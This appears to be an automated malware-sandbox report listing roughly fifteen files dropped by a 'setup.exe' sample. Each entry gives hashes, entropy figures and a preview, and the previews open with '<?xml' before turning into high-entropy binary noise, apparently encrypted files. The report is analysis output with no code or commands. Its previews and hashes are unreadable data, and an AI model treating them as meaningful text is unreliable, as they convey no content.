              Preview:<?xmlR.k...V.t../......kk.)...>..,.H...Q>u.^?..:.u.[..../T...)..R..KBT.k.4.SCK..P|.....p.....Sf.R..Cr.J...Wjc.....w.y{b.H.....7...]r.v.'.u.g.A....._I.....^......#k.L?.....L#.........u......E2F..>.,n.G.S^.?;......x..;.T_e..>.r.F..a5N......6OcD.T"5Jl..[.....:`o.....?..`q.pWA....j.o.K..L....VSnJB.S.g.;e.(o...kY.W...JhR..d...V8.h."./.. T.H.....E.u. 2$..YR...L.1..P.]..K0....a...C.......b.;K.....?..t4....^61.Mr.....o*..j2..s.r.C<..O....Qp ..q..!..'.....'..)@>...J...[b{.-......Vk\..a........&.?.)O.G..`.c..JKWK:.=W.Xy..".n..._z.x..L......G ....w......c./2<\.x..7gt.&?.f.A.x...o@\.....q.ca....}....8........O..#...g .;i....{e...Q...g..<...tU..od......H6e...~;.....brV..w......-&.S..s...2.|..uvl6.*....%T.G.j.n.Y..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):753
              Entropy (8bit):7.660851743125177
              Encrypted:false
              SSDEEP:12:uP1EfIETRBPZvpbaMLxpLLIdLoQ4JPTMG4rWvBc6DGU8F7SpzQsMR2cii9a:Au9ZaMVRLIlb4WJqc6aAlbD
              MD5:49804A82EC4D2C8F783A906E15B315BB
              SHA1:7563BB375D4A6B2F5EBC5E98864318D2BB386D73
              SHA-256:696284D1A2025C0358CB3DFBB4C2784BFB5A88537FACB289503EE909A235DD0F
              SHA-512:05616AFAF4849AEF18C42B36DA87BBF3DDF7F2F713FE746CCCD400D6DEF2D78F6BE7D167704A894E7415A139FE46C1D562A0E888544CA7EE0F9E4C18515359D7
              Malicious:false
              Preview:<?xml.8.P.,".s'=...g....tD.fS...x5C%.2%...dB..v.......5.....5....~..%.[2....w..O...!.a./....e.L..TTw....|UR<......:X.:Z.Su.....w....L.x....W...TRr...}.3.aYi.o./.u.f..B..}.[....m...:..m...G/X..g..vS..p......}$:^...?.!:..!:I....L.k...(1.\>..*./..%_......g.x). .'..O.e._.....s/.2W..C..............c...h.=5..j.dvoh.$..f.$.bqE[..]y..E.{......hK.s`..S..F..Z..4.....Y..dg..^ROX..G..jl..x..5...{......G.....".9...../...S....s.3j....= >X.fF...D.....U.]..{E.y5z..<...;.y.=..lr.....\.c..K.]ZI..}.8f,P.PNy. ...._.|/.&3...e/*...b.M}h.0..L.*.as.MeCz..=..8.f`L-...n.....l..R2.Y.C..FB.O...."4.y....C....q.0.'..P.U};?.H..hym.k..........)d....:.....v.K.'...a.r.BVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):805
              Entropy (8bit):7.739185344853599
              Encrypted:false
              SSDEEP:24:1LV8ki+jeMI2Ln1RXEQ1qh1reFYpmIMYNlZWbD:I+jeMlj1RHa/sIED
              MD5:074E463C8A20625BCC0CE36535A963FD
              SHA1:A3AEFC4ECD7EFD2F3249697B9C01F6A2F510D807
              SHA-256:F4F494B52C007755E0EB9DF5AFBBA9A36EE0AD27914A63D1BBA09924EF6479C1
              SHA-512:BAC02AF7BB910F269F15EAB27A338A7F55C1116E0F0B338FC0DDCA5B2914593F447B081407BA46CE55C5AD71673AD860F6AED548B2C9E77F81A97929C68FC224
              Malicious:false
              Preview:<?xml.'..9.....K.....A....^jB..E.....F......z.b^%.2.h.A.`..4W=...0....4...././..<%.^..{B..6.]9Q&....Y/....X...=.I6n.L8..J\V._Z)1...Rl==.8.A)Z-2......E.9.......'.*"O.#.,._#..@.F6.\...........GS....)...J..o.I..>.m...)....F....+h.x.....F.....I^.E.x.V...0.=.4..tu.U...K.&.?..M..w{.....Z...{.......1*2Nf.6n.f"...1..(. ...1..<%.@..V@g#o.p.H.k...*...u..;....6..'S....jm..e.u.o.A.......l...>..#..v.D.M.w. .M.Q...1z.C.I..m...-.?..$....$..*.di...g 6)....(..{....}....).k..L.?yJ...f..../.%... {fX.:......@Hv..r...L\dB.W0-.U..M$.......3:..........z...O.M......v.7.C..(?.P..s..4d.[~.._R....e..5 .\.n.n]..G>.......W..ZT.#I.?..MM"..,...D.g.^.V.. =K.....y|....t[.s....a.U.X.....z.>A..hP.;{.......EtLHg&..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):760
              Entropy (8bit):7.728176204817547
              Encrypted:false
              SSDEEP:12:Hf5hZflujzNJjP5T4OFIfA3fMFIsrwRU4uM4iql9oCT4wvYqMqxM1sMR2cii9a:HxhZElJDyfafMFIsr2SM4iqQQ1FbD
              MD5:AF28FAFBD5A17EBFCF7836478FAD06BE
              SHA1:ED22BB565C210222733DBEE2A36C4FE3B6047266
              SHA-256:7100153F12CE6CAAF265EBD45F7A5E7401E357ED6C9E46E3B001661800CE0987
              SHA-512:9FCCDA20E29F647FB7F2879DCBFB9E4DD871538602C1D921B703A39EA39EB77631D2D9F2BC786696C8237B4DCEE0031B6F97A6AC550E3B22F1DC7B9929D6B35C
              Malicious:false
              Preview:<?xml~N...w......1....F...x..3.yi..r..n.'...z.......%U.B..<bS...A[...u....&..../...&......U...i.V..l........;..O......=.<...'..-t9F.s.a.....{...@..p.Q...Q........d..e..uy.>.o..5-..*...w.`p..7.R.~...tcn.yFv.s....t.8.crK4...b.v.....2....q9...}.....W..v....!..#.. <..+M..V.Q.y...6..1.m.._..../..N._...7.1.....~!. V.8.......Q..N....+..Q.n9+..~%..+.60`a...%.\.F-M........}...9@....=.....Vg....@a......8...ekC.9.9....S.y05..1.....X..f|..........A.......#i4I.j....*%.e..tc..i}!..k..S...S......j,a..,-@.Z.;l/..6R....>i.t...'T..y2.........l....C..O..@...O..<5 .a.......t..8"l..gt...;..q!J.l(..s...E.ubt.J...{:.q.>.....B......E._......32;.r.......J...p...VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):819
              Entropy (8bit):7.755056683429762
              Encrypted:false
              SSDEEP:12:z8CB17NshwZVKvqQxMWJcTQoJ748Eor9N4p/2InxhyLpfJaOwfunS8dsMR2cii9a:zNVZVKiibQQoK8/Oes/yLpBaHmnHabD
              MD5:1728206920A56E9A3A314C9CDEEC66EE
              SHA1:941E13760FDA061F3B1DB1B69DCD0D42E848D8B8
              SHA-256:AEBF6B8BD22F6107EBA3578A5092007EDAA48E4571527FA2D9A50E3A758E37AC
              SHA-512:1FA332F00ECCFBFCEAB565CC9F7E5A13D8D148774EBB7CFDD9D561F3F46E52B07DBE406F6BC2160E91479FBC8DEF46F29F04F47D660A904DB147773A67251F1F
              Malicious:false
              Preview:<?xml.l.w...x r.F.J,a#D......Q.>$.?...p..@..l4.w5D..o..$.|.SXL.TSiW..T].-..)...K.M.,.J..K.w..7.hX+z.W._>.o.?.....|m.w-...&...O8"\..~U)h....N.*..[C..t.=LE..U.U......J./|.....W..cJ...f...G,...0.....;..*...........7G.*..I.{..q.{7.J*.Zy3R......R.:.9b..'x....I..h..2..QD.#.G.V.k..O.)5.....:.i]../.WBoH...Q!...]..I?7=C..wc..b....W..'......hc.6.....0,.f......#.b.Kv7..I.w......."i%T0#.r.E\......m.....S.E..X.1Y..mo.... .3..&z.S.."r?S.._.f..o...pl>...x*.n.}...RU..k..K..O...........Z..6..f.7...XBd.:/W.Z....Gc...5.'.i....Y.....#....X.J..d...Y..-e$.L.,;j..f.....g.....<.P....$........C.PO...F.x.[Hu.x...MQ...@*.."n...K.S#.X.\t+...|=:.Sv.m.....o......7...0x-.].v..U......e...|.(....0K.....Sm...}Z.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):756
              Entropy (8bit):7.667397815582402
              Encrypted:false
              SSDEEP:12:Ub2fIsCUNN6QVCTd8kegI4DhR+KaTm/6opDTXnFug5JfBC0sMR2cii9a:CXUNNZWiiDn+JyFu+wbD
              MD5:EF1972025962C902CA725D0E87AEB504
              SHA1:01E8AF0690619F116BBF4947E1C1ED7B94D50D7F
              SHA-256:332AE862E791BA1A3663CF986D88632B4B8EEC8E4ACF1C59D245EE7D1540395D
              SHA-512:61EA87ECC5D708227940D78E46EB52543F7F9C71CE489DC7B207021670565335602F645CE3052E2818895EB8D9A29F99840688FA5AEB1D85AE2CD8D35336D36F
              Malicious:false
              Preview:<?xmli..x.Pz..J.cJ......i%..7.....jH........,.J.......o........t...o"0..|..=....V..H.v...Y..I.....Q..8...-E.....X....f?....q;`..O..@R.+x\.b.Y.c...p.....C.^'..!Q...f...]..... .IE..j.v..[.&v..2..K>[...<..Y.Id\D\s...,...1.P&b....P5.du...VG.J...`..t.....Uv./n.Yq2.`........cH...sv.;I......x.W.MxZ..a1.....hQ...M....=w..To)....j?6..K..DQLq.\.... .T...H./...f^...o.....k..)..#I...Y...m..'8...uJf$.}.V......,|.f.]......Q.1..k......\...<.&..n..........`.....!.(..a......@..m.tz...-...+t...d..r........r......].i.Wj_5..Z`4z.qN.1.Wy....}<...Rw.[..;.....Q8.G.{.Q|....vz.N.......Mo.._=.H$...J0.Z..[<.i..&..r......K.i..x:..^cu../..K*..N.P.i.2t2G.q+...VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):811
              Entropy (8bit):7.6791870535603515
              Encrypted:false
              SSDEEP:12:aMY3nm4Y1SWZWfCrNeHdWhmTPlnDY0eioX81AKOcUQ2OCRjgaXYsMR2cii9a:A3mYm7eHdWETN6f81AOipFgaBbD
              MD5:6DF19A3B3482F50373D3329486D81400
              SHA1:BAAA91ECB7CAA407642DF0C9C1FDA3857B414DBD
              SHA-256:32C53A99A0461460203154A3DBA0585E1A5E5DE4DDFF3313D93CF16D1F696FDD
              SHA-512:BBA90C65910B7461840E1E8733F0C3957E19E53F9C204A558E3A9671029944B9F87A745A6241AECDA27C2FF2889DAC37266D1441361BB2557FBCB9CE8415150F
              Malicious:false
              Preview:<?xml.L6&....>.......T....=.%i.)v..W....LK.q?..v..^8..C4.mp..o..7.f1....e'..`..hY.d.Q..c_..(7.. -%..^c...F..OT..S....IoT.i....@.\?...!zT...f<G.s.....O'M.h.......OF...:l|.O.`..W.......^.E....}".?F..}...LvYn.L=&@.aS...6.Z./=.P.=EDY#.}$...,.G..ih.n...r..l...T.0.].f..O...,.b....KA.1.=0}.,.@.t.h.i.u:PXz.^.'*/...F.S./(..=k.o'.v.A.Q......n..+[.i.:%.g..L..a...M.. ..;.....{........3...G../...n.-.X....,........FE..L.V.y.i..b...}}.Ofy.6..k.........+.x.*.x..8~[........q...=..l...#Sf..i.^.C..3..D.\......?.(t2l..IvhA.......f.............A.AX......I..4..s.4.O[..[.4......`.o..D...}.vD.9...xD.Tj%.a.m.$e..(gI.5....._y:m.Z.........H.h....o8...3Y..rp.`l...8Xf._.V.)..IK...*..b.S.G5'...a.U..>!.y.M.'.......p..C.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):737
              Entropy (8bit):7.689748733232001
              Encrypted:false
              SSDEEP:12:slKj1JzPoIk9q11VqtKiRl+uBqmhuDZ7owCeH4Mzh/zteXD+rAekqB16ArRCsMRw:VnzPliqw+WuDp7TH4AzECrAe3B15rpbD
              MD5:6C259C8155FC206A97E46DDE4B31F77E
              SHA1:695C95BDF793C7F126FF15C2B750F56A47F472D7
              SHA-256:29743A067DCD3F264D01578C17C975624471C012A3CA692C1072C7FDF883A83E
              SHA-512:C84A9E866E5108A366989963A97BA18E35EB3D2B085B5C5EDC83AC0429B591DB0BBD3BAFDA23D32B98EE73AAAB85DD3A710FCF9E6C863AB3D1C8EEFC752AC5C0
              Malicious:false
              Preview:<?xml.O..P/..igb.J..rL.....1-..i..T..`.;..P..&B.#H...LA.....2..)...J.(]F..I.|......9...._E......d..^..+=ah....G.kZ5...B..2.IW?...K..@....r..........Y.j......U/N.....7...I...................u,`..s=.<..~.>@....~.Y.:......{.&.=uN.].n.z....Q3k..{.-.p.8g.4T.n.c..2......pb.....nI.....`P^..Bo.....X.....K8..)Q.........6..r...d.j...I....t..Iw.ft..Km...g7...~[h..n(.N..-].c....V...C...@.q../E].v&4..%.'..z.d.Z.\.%..p..v.?......\y.>.......%.vo./....aD.-ip(9.....r\. .p..&..W....i.K.gS[".en>8.v..jW.D.'...o.^..C0.Q.z....g{.....w..n.p..FC..-.U.r..e)9LV..n..N....JW...p\\......U...j7.Eta...O.1..j...j..8.w...y..zl.....$[.a.....u.~o4..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):801
              Entropy (8bit):7.713768586549521
              Encrypted:false
              SSDEEP:12:UZkHCR32TS1/RimBG3hvSVpLpi+0VG7tkhuTS4LcFTR4vfhWNZT54ErRsMR2ciik:C5UTuIm+SXLyVGMfFFl44ZTCbD
              MD5:8190C9764D246AFD9A854FFDBE75A5A7
              SHA1:09096A1ECE17C7888D06C246FF61463E61DF077A
              SHA-256:344FC294F36C252F8D2A194CF7805AC27EA7B34DF8AD0ED7F54ED74A52F745BA
              SHA-512:7A833D0CFE3234B60D93C1F512ECB63D13F54681E4A89DC281EBC6F6476B467C5EEE6D3DA5D783FC719EA8F82A9AEFEFB31D09F3F22658F26DAD7A9DED64422C
              Malicious:false
              Preview:<?xml)M.........}..{.....|.4....pB..G.....>.@.V..@j...AR4]U...;Z._Oy.\..u']...oC...F3...(....-......x.....M{.E?..U.F.".E...nYC..vg.[..EhX.KE.<......1....+V.r......P..p?x=<(^...T.\#.+G..U..z.....RA.T.z..u....jR.a.F.=b..2q,..1,B..`.........9{.$......h..@D-....QQ.......n...se..b._$.-h....y.../.....t.?.....@.V.Y?...d.(..q.h..nLq.6WD..A....0...1kS!.}I..&.d..?{A..Q.!.C-M@;t..4.(6.<Z..lp......3...X$.\{..a.zC..4..>$..Vy..B...x.hU ./.B.x.O.a..K../...*R..:........S.U....Z..\uCwy..6.1R{.......L.:.D.l.P.6SX/.N?e.X.O..Iz...R..O@._7.O...|.#7r.m.L.t..G..z3..bz.j..:.....cl^.g.?g:{.*..7.i..}ZBC>..uV..s...j.....l.Ve."..+O.=e....8....v.c.a...i...X........q..{..0v/....M..7... .7...T'..w.....~UVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):733
              Entropy (8bit):7.724702426229525
              Encrypted:false
              SSDEEP:12:AIpKuL1Dd6VyIlxe6rfZsOEm0VPxA/lHgJsMBP4bNl8QpqPWzPjAHPRSt8E/0mNU:hpXLeoa4gPERVJAd1M90EGWajPagibD
              MD5:48F4EDC4ACDB99EEB7861827BDCA1020
              SHA1:3D6CC1710FF66E062EA585CD947B878FB52C3FDB
              SHA-256:C8FE4A005C207B3ECDFCB59144FF81919A8C9B5FB94189FAD4B89931BB7C9DE7
              SHA-512:4F87AE131907B98756D32852DAA604DD161E2CB3A95B800A4F9DFF2F7EA7C2BD4B5AC1EF557D25AEF440A4E33A88D4BA453850AC8E387CC08ECD83F4E7C174D1
              Malicious:false
              Preview:<?xml....h....*6.....mS.7..E........%....r.`..1m....$k3b..ud)..m....).....f....oR.......7.(.n~......7w..\.:gk.......p.4.....O..e...%r..e..0..yzL..P........B:..a.N.w.G../.J..v].......U!./...../$...&.......>@.A......X......'%'*.:.|.t..S.]..O.J_.`e..~=.E.T...........~....>M.1.a.....9.+.......,&W.?....."...~X:..O.T6j.bW..7..5mI.(........,....|... .."....[}.3I....g2.s0....0...h.=.....vRM..|.AJ7C..m.<.C<...d..O...r.*...hVP.^..G.b...[.Nm1$.&.....G...%.....6.}.|....xL.fg.p.b ...X"..Oyx...F.....!.Q..8e1..B..I.u.%y.9a..p.m..%..b.d....a0.G.....u...i.^.C...]...(...O>X`.LS+...g......\..ge..A.u.].Wl..C......x.[.H.o@..d.V..f..:.>.gVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):812
              Entropy (8bit):7.76759853853482
              Encrypted:false
              SSDEEP:24:HC9b4RM6sBnBmG+sqpWGJHuslVStkf7M6slt2bD:iZV6+BNJ6OslVS67YOD
              MD5:3A52B8F8A883BF4A78480FE0EA9B90B6
              SHA1:D9A74BDFF3F64D8223AE01ACB5F606F35BCF6BD1
              SHA-256:F52A0410E5E3DFF555F2F4BED9F1E360B812BDE41A64BE3A932DA4DBE287A91C
              SHA-512:9E020BFEE1C28E2AB30B2B7D60AE652287F030C392401CC048D91F8987837C26AA39F2F4561C8C8CE2559674F627EC248520DBA13D123544D2C1BE16F09FE19D
              Malicious:false
              Preview:<?xml...n...&...d.$......(Q...PT.U.{......\....TN..J...q..?.r.'....XLLLp.e....^.....);.......%~....n....g3.H..U.^....<aW..W.6....Z......6...TuR`..F..S..3...X....j.......E.][.....]k_.2.Yn....YB..q.V...F.....f....V..|...$.m.y|vc...yk..h.\6\....5.\'.rd+..d.F.W0.\....q.......X..d.WVn}B.@].A....}..[Yk...I..*..d>4Yf..W...A..E......._..V...4.....(...mR.E.{....V.t...y.!a.g..]..Y?.'......r.z...!#p>....m.[.....A:.l..i.N.........l.....g.5.$...|r...M/.^....<ao.Pk.C.I......S..K...-w...........};vn.....^6^..I.0P..?.sO.O..i...7....q'..%.t..ys(...1k...s..c...0K..3.../1.n.lq.......i.1.g..<.E.{T...:E..).P...o..hUG..&#&..W.P[K.....A..z.......UWh.,.......].m.{.x..1.....O..8.VjB3.........wj...u2.H...~..'2VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):758
              Entropy (8bit):7.682671802155452
              Encrypted:false
              SSDEEP:12:1yl3Qha6KV2s6pZtPTm1pU1phaw5RGklP2L25vnuBOZtVZ5naa9Km7g5cQxDsMRw:KDo/PlTmjU/1KklPsIQta977fAIbD
              MD5:874AFB5AE8B17FFF519C9207B4C3462C
              SHA1:551F2E326DA11D1012623626E80DD4C170DE4D78
              SHA-256:DCEE89C20897E25540E36C4C074B95D4F7C745611BA92267597B41185D551A1D
              SHA-512:D6862598DCD111744F6B061EA5C71A080A5046C5ADF775F86D59A7CE1C08BE3926F786E6ADCE35B8685292D3389CF2979C25D73CC4559EDBDA97B739EACAFBC7
              Malicious:false
              Preview:<?xml......_m]%.<i.n.T._.,.LB....?.9<.4.^.=z..l...M..i..&@ifG.i3..3^Xa...J=........B.h.9nD4_W.V?M0u.^8...M.z....A..G....}........K..`e.O..aZD..2%.d>.Ay.O..u..|d...o./;.d..+ki..Y..<h...[e.?...z...%J.G:.q7...=.....l..*...*m....*...v....C.....p..TVL?4..#.).6z0j....E..o.S...Q.'...^n._}..rO.......j>.G..E .. G...{....AM.K..{L..F..9Q.{L.S.....Dq.srW(a.a.2G...1.....ar<...B.".)C =.jJ.j.. ..R.....{K<.,.}q.p.6.e.j.0q.;L...6.^.X..".ow@.<Pkms...D.B$.un]..W...!..@.A.|s.L"..4.Q[].Q..P....a!".p.>?g..^.....n..._".*.....d.W_.F.`n..QgY.*.M..<.....y y..sn/,oQ....z.......n.m.|.J.......dMCw...1C`.._H_5..O..y..z.S..........$G;.\.........M...*.$a.hp.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):808
              Entropy (8bit):7.755270293147737
              Encrypted:false
              SSDEEP:24:Xx5xJbB+rDYgmf1SeJXPvATSszaCjBt80IhbD:h5xJgD9mf1LJglBq0IxD
              MD5:F3608D0946B40B056898002DF6E07FBB
              SHA1:D93B752ADFA5DD4982979111DE2E5FAE3D4F29C3
              SHA-256:5DB50C69B61BBD8CC58DA019BC48F3B7150FAE817BACB3E411AE9876E8840DC0
              SHA-512:F690C2D5112FD26707CBD108229FB73CC7B81CEF20E586E946C2CF05557ACC0BB8A57D0CBBEE0CDF0F4D26DBBD9EDA2F7B2E0097DFE088AAC98D114333BBD310
              Malicious:false
              Preview:<?xml:.L.I.~fR>.CH..H.s..a.......>..P....cW Wfh).Q.......d.}.V"..l..;.]*.L4aU....].P,+.^.-..3..h.vTQ....z.{.....5.!.I........_..4...P...Bv..,.'......."j....D9.....>U.qq...9^.,..:$o$..a.9.. C~.H..4q.. .B."n...r".....&....]..7..*.\.......&..|.}zG^2....xU..Z.N..j..Z.im</.n..Z..i..t,...".......$b...Lb...9q.."......'Pt5.m...lE.%.._../EM.A...-..`T..{......p%...N..._.SjX..CgcR...\.QY....K.V.}/..`.>.N..0.\.G..-......"...qfeQ...w.P*|f._L_..U`..9.(.c.&. .n...?U..s..].. .0..NT=-..%......w.%....*F..QN....2T.......i.1.').l_H...|...P.?I..>(6u.7L|l..".:....:....[s8..<.........+o..W_]...3].7&H....h.,.Lw...q..N.h.4.<]..r.g....(...[.2.H.d.0.~..S.~..?4...TVlr...`...<....<....q.e..=.!.u...##..W...n.[?.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):781
              Entropy (8bit):7.70510324446999
              Encrypted:false
              SSDEEP:12:wawrAWJzSVxVqis1pVccUcNezNpLmS81FfYpGA57cR28i0yzsMR2cii9a:O1zycis7KCMNlnEFQpT57P0yYbD
              MD5:844F395208CC4DC39EA18433D2A5DCD8
              SHA1:75273279DA5800982ABFC74503C2198066DCFE4A
              SHA-256:6FCC161588CBB13326CF3A1E88B342A3BDD2FC2F824A48CBE7E8C971702766A6
              SHA-512:4FB3B60C72B6AC36813343BF1DDEA6EB47458E5B4493E9E61B3054A0AFF82C4B93957FE85D751F867F5D9941864108F2B67FD5381D945275293D12F78182A2D6
              Malicious:false
              Preview:<?xml...;.~....o<..O.*..T./.....2..Q....h..e.....J.K..].?[!.P.G..)EO.:.P.U]~. ..K.....O......j...0.&h[mX....G.l7..yW*|D06S....w.S...*.%...#..^..N....H.3..r>....$@.K..;|.*..._..I....$bk.6.f.P..y.C.d....p.)}.s...V%.tw.6.R.4..B..%.....7.X...nfi...K.......rb|"wjR.~.74l|l...V..d...q#..y.......H.9.b.w..p.8.|...h..B.C...Z...(..HK]Z.k...X....|...-Wl...C......mVk..b.=.....I..?.....E)A.f.}).xS?).R.sI.n..22..y9,....I.1..q&..R..BM....t.7..a..4\....`%SJ....F..Ln.6Zb.....+a....U..5...U1..U....F*y'.2.eC..&......on.OD<..3....RSo..>......I#..5.u.4....'*..0v....]....]G.o.&.gL..<V.t...O.#.5. .|6....t.y..".k~c..S.L%FB..;*.2...4Z..%....z.q....\.....?..>...G...3#+...F7...s_7K......s.&s.|FVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):824
              Entropy (8bit):7.681878880335779
              Encrypted:false
              SSDEEP:24:wrq7LzNqkJ5h+8SOC78FCUJEMixc1FQsG0bD:XfzBJ5h+16FCys21FQsGeD
              MD5:1E0F2019FE6D65EFE8EA64F226AB6077
              SHA1:065001C4CCE119B0767F1DD3151F92C98E3CF5CB
              SHA-256:3ECBEF7DF848FD5850952BDE2646940187F08DCE73CE430E2F1C6F6B8E7C5488
              SHA-512:55AAFF51BBB21872976F097CCB2AB7785C6B8DDB31FAE0FD20E457C26E60CBDA97ED1F8A3AA0A16663984398822D88E6AD8508B4FCED94AE7E7349740CF91BF1
              Malicious:false
              Preview:<?xmlq..-.q..t`..R..Q....D.0....H.:.^..,@"...@..HKD..9.q...ob........<.[%...4.`......S..B.R..J..!v.[.......m3......N.).<}...u.....1.Yq......j._\.z.rG].t..G./........m.m$Ld.0CJ@@r{...I.;K.N....T......7z...p../XZ.)...,O..e.8....pM...&.....!_2ND....|.:.7....BW.[j..J[......naN....j....4.H.q.......5\...u-.f..#.;.....1.4....o..M_...:@..aKa1...%...n"...3o/?,).U-...S(...}('....lQv.X@..[.{6^..d.u?.E.3...:n..~..T....V|.......p.6...).fr..N7....$.7.3.<9.8^.%W...e.%ID.JhS.d.P1!.~..\X......./..,..elq..z...`.0.-.H.]4.K..V`X!F.B:.>$.1.._....>8..U..)..m.P.. .g1@...$u..:A..ej|.$b$Z.:.T4.....[....!&.{..........(.0`.8....-...:.2.p..F:,.?$.q..L.....wS,kn.\e]R.k)....H..!.L....-.h.I...c=.../tu.<..}..I._.S..R..C...$!.....VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):749
              Entropy (8bit):7.687536014688457
              Encrypted:false
              SSDEEP:12:HyI0ZzyVLjpBSQ/6xYs+IY1D1qBpPSdWaK+wQd/spT3BI+fOZEcDrWb+bssMR2cq:S9IVL2Yss1D1i4WaKzPnI+fOO+rWWbD
              MD5:32A3C6035C22F1AA5F694C160EE99830
              SHA1:4123FD2ED8B5A7BC2E43FC1E3A8990B7A4661017
              SHA-256:D76F92320C2CC3C74E6E76464376A73EE58B3BB492B71E114A46C5E19033ABB5
              SHA-512:854D829D28E3EEDCA6DCC05E65BC3AD6ECBB0A1964B03A56BF4A93B30AC2331E3F5869C45A32688D62DDB30EDD6D71FD06FFB933ED3FA8CDA9BF69D75A793CD7
              Malicious:false
              Preview:<?xml#.-w.....d.g..h..B..?_ HZ.lLy..5...Dr..Z..B..!e.b....{B..RV."_r...?...Y-.M..ae'.D...F'..#....T.D..F(C.*....o%m.e:.d~2..r!.7{J.U3...v..S1.|..D..`.;\*j...ENDz......+.2...q_._.L...."....6.....-...#&..\.!9.I..Vr.B.NJ.h.>.BHK(....j.........c.K...`....).!.U..z#..&....%V.G......[..}....mR..o..-.D...Jt..cJ...ksnX.[A~i...}.M.+U.).......A/)1...~D. 1.8.s).L._C...-...e6..:=.p0.~...3...PYe<.....oT...)v...b(=.c8....L..t.=....m..eka:ZT..~.....39....|*0....{...i..E.1R..g...z...|~Lr.L......udr.k^...!....2..A..5.XN...8...M...v.@....H...p....oT-.}..eH.Ds..@.<......r/.!-..{....b........Yy".....e.....H..w...vs([)O.`.zt.@.h.Z.f..}B.X{..0Ja.P.uHiC..x..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):812
              Entropy (8bit):7.707332354936555
              Encrypted:false
              SSDEEP:12:JfHkEtI4uqbS7o4uz+YWnOVEmMkNrB+q7KAOq+FBhRUrlzhwORFLLtzsMR2cii9a:JvkEtI4uqe7EimMYjKvqohWzhpRrYbD
              MD5:F40FF7858AA80B4289C89E3245C85F65
              SHA1:7383678E560440A8FB6A9015F7A41F556B3D6304
              SHA-256:CFE3A2F00CA6259916FEC81870141BB79BF1424E535B128AE8E85089CFB3BB0F
              SHA-512:8FA5AA6DCFEEAF9D57EE5313CDC959BB176521836AE8A6131C297076DB329986F5459EA818FA99E6B482A5FA88E0B2D5FC5D68B2164E5A6B3D845EB6B00BDA80
              Malicious:false
